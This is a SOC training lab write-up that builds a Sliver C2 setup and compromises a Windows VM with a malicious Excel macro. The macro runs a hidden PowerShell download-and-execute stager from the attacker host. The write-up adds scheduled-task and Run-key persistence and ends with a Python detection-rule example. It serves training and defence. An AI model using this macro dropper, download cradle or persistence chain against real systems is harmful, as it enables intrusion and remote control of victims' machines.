As part of my SOC documentation development, I set up a Digital Forensics and Incident Response (DFIR) simulation using a Windows VM and a Kali Linux VM, both hosted locally. My goal was to simulate a realistic cyber attack scenario where a malicious Office document triggers a PowerShell script that downloads a beacon from my Kali VM, saves it to the temporary folder, and establishes Command and Control (C2) traffic. I chose Sliver as my C2 framework for this simulation. This writeup details the steps I took to set up the C2 infrastructure and deploy the implant—a first stepping stone toward further DFIR simulations.
Sliver is an open-source C2 framework written in Go, and I chose it for its simplicity and one-liner installation process.
Installation:
Copy, paste, and execute the following command:

```bash
curl https://sliver.sh/install | sudo bash -
```
Launching the Framework:
Start Sliver by running `sliver`.
This command opens an interactive shell for configuring listeners, managing implants, and more.
To catch connections from the implant, I set up an HTTP listener that mimics common attack techniques.
- Create the Listener: inside the Sliver client shell, run `http`.
A stager is a small script that downloads and runs the full implant on the target. For my Windows VM target, I opted for a PowerShell stager.
Generate the stager. The one-liner that fetches and runs it on the target is:

```powershell
(New-Object System.Net.WebClient).DownloadString('http://192.168.1.XX:8000/Stage.ps1') | IEX
```

To deliver the implant, I crafted a malicious Excel document with a VBA macro that downloads and executes the stager.
- Open Excel on your Windows VM and access the VBA editor via Developer > Visual Basic.
- Add a new module and insert the following VBA code. This macro downloads the stager to the temporary folder and runs it silently when the worksheet is activated.

```vba
Private Sub Worksheet_Activate()
    Dim strCommand As String
    strCommand = "$url = 'http://192.168.1.XX/stager.ps1'; $outputPath = '$env:TEMP\stager.ps1'; (New-Object System.Net.WebClient).DownloadFile($url, $outputPath); & PowerShell -ExecutionPolicy Bypass -File $outputPath"
    Shell "PowerShell -ExecutionPolicy Bypass -Command """ & strCommand & """", vbHide
End Sub
```
- Save the document as a macro-enabled file named malicious.xlsm.
With the malicious document ready, I deployed it on the Windows VM to test the C2 connection.
- Move malicious.xlsm to the Windows VM using a shared folder.
- Open the file and enable macros when prompted.
- The macro downloads and executes stager.ps1, which connects back to the Sliver listener.
- In the Sliver client on Kali, a new session appears—confirming that the Windows VM is now a beacon under control.
- Interact with the session by running commands such as:

```
sessions -i XXXX
whoami
execute schtasks /create /tn "MyStartupTask" /tr "C:\Users\admin\Downloads\UNLIKELY_DUNGAREES.exe" /sc onstart /f
execute reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "MyMaliciousApp" /t REG_SZ /d "C:\Users\admin\Downloads\UNLIKELY_DUNGAREES.exe" /f
```

The first two commands confirm connectivity; the two `execute` commands create a scheduled task and a registry Run key for persistence.
- Network Setup: Both VMs were maintained on an isolated Host-Only network in VirtualBox to prevent external interference.
- Defenses: Windows Defender was temporarily disabled on the Windows VM to ensure the implant would run.
- Monitoring: I used TCPView on the victim VM to observe the connection.
- Persistence: Commands were executed from the C2 to create a scheduled task and add a registry Run key for persistence.
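As the defensive counterpart to this exercise, here is an added Python example (not part of the original lab) that runs simple detection rules over constructed Sysmon-style process-creation records covering the three behaviours the lab produces: Excel spawning PowerShell with an execution-policy bypass, `schtasks /create` pointing at a user-writable path, and `reg add` to the CurrentVersion\Run key. The event field names and sample records are assumptions modelled on Sysmon Event ID 1, not captured telemetry.

```python
import re

# Constructed Sysmon Event ID 1 style records for this lab (not real telemetry).
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "PowerShell -ExecutionPolicy Bypass -Command \"$url = 'http://192.168.1.XX/stager.ps1'; ...\""},
    {"ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": 'schtasks /create /tn "MyStartupTask" /tr "C:\\Users\\admin\\Downloads\\UNLIKELY_DUNGAREES.exe" /sc onstart /f'},
    {"ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": 'reg add "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" /v "MyMaliciousApp" /t REG_SZ /d "C:\\Users\\admin\\Downloads\\UNLIKELY_DUNGAREES.exe" /f'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe notes.txt"},  # benign control record
]

OFFICE_APPS = ("excel.exe", "winword.exe", "powerpnt.exe")
SCRIPT_HOSTS = ("powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe")

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def classify(event):
    """Return the list of rule names a single process-creation event matches."""
    parent, image, cmd = basename(event["ParentImage"]), basename(event["Image"]), event["CommandLine"]
    hits = []
    # Office application launching a script host (the Worksheet_Activate macro path).
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        hits.append("office_spawns_script_host")
    # Execution-policy bypass or download cradle on a PowerShell command line.
    if image in ("powershell.exe", "pwsh.exe") and re.search(r"-ExecutionPolicy\s+Bypass|DownloadString|DownloadFile|\bIEX\b", cmd, re.I):
        hits.append("powershell_bypass_or_download_cradle")
    # Scheduled task created with its action inside a user-writable directory.
    if image == "schtasks.exe" and re.search(r"/create\b", cmd, re.I) and re.search(r"\\(Downloads|Temp|AppData)\\", cmd, re.I):
        hits.append("schtasks_persistence_user_writable_path")
    # Run-key persistence written through reg.exe.
    if image == "reg.exe" and re.search(r"\badd\b.*CurrentVersion\\Run\b", cmd, re.I):
        hits.append("run_key_persistence")
    return hits

def detect(events):
    """Map event index -> matched rule names, omitting events with no hits."""
    results = {}
    for i, e in enumerate(events):
        hits = classify(e)
        if hits:
            results[i] = hits
    return results
```

Running `detect(SAMPLE_EVENTS)` flags the first three records and leaves the benign notepad record untouched; the same rules map directly onto Sysmon or Security 4688 telemetry from the Windows VM.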
This simulation was a success. I set up a Sliver C2 server, hosted a stager, and deployed an implant on a Windows VM using a malicious Excel document. The HTTP listener successfully detected the connection, establishing a working beacon and mimicking real-world C2 traffic. This hands-on exercise provided invaluable practical experience in setting up and detecting advanced threats—a critical skill for SOC training. Moving forward, I plan to explore additional persistence mechanisms and experiment with different payloads with anti-analysis tactics.